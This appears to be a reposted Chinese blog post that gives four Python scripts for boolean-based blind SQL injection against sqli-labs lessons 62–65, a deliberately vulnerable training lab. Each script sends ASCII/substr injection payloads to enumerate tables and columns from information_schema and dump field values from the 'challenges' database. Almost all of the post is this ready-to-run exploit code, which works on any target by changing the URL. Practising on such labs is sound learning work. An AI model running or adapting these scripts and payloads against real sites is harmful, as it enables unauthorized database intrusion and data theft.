标签:Less62 col labs sqli print sel tb payload times
前言
运行前需要下载requests和lxml包,修改url和referer的参数值,改index.php中$times= 13000,重置一下challenges数据库。
Less-62
import requests
from lxml import etree
"""
Less-62布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
Less-63
import requests
from lxml import etree
"""
Less-63布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
Less-64
import requests
from lxml import etree
"""
Less-64布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
Less-65
import requests
from lxml import etree
"""
Less-65布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload,*params):
global request_times
oneword_index = 1
tb_word = ""
while True:
for i in list_range:
# group_concat把所有表名写到一个记录里
payload3 = payload_key+payload.format(*params,oneword_index,i)
a = requests.get(url+payload3,headers=headers)
request_times += 1
html = etree.HTML(a.text)
tip = html.xpath("//font[@color='#00FFFF']/text()")
if len(tip) != 0:
oneword = chr(i)
tb_word += oneword
break
else:
break
oneword_index += 1
return tb_word
def main():
sel_db = 'challenges'
all_tb = same(alltb_payload,sel_db)
print(sel_db+"库里的表:"+all_tb)
print('-'*100)
sel_tb = all_tb
all_col = same(allcol_payload,sel_db,sel_tb)
print(sel_tb+'表里的字段:'+all_col)
print('-'*100)
key = all_col.split(',')[2]
sel_col = key
all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
print(sel_col+'的值:'+all_values)
print('-'*100)
print('一共请求了'+str(request_times)+'次')
if __name__ == '__main__':
main()
标签:Less62,col,labs,sqli,print,sel,tb,payload,times 来源: https://blog.csdn.net/weixin_43623271/article/details/122801470
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。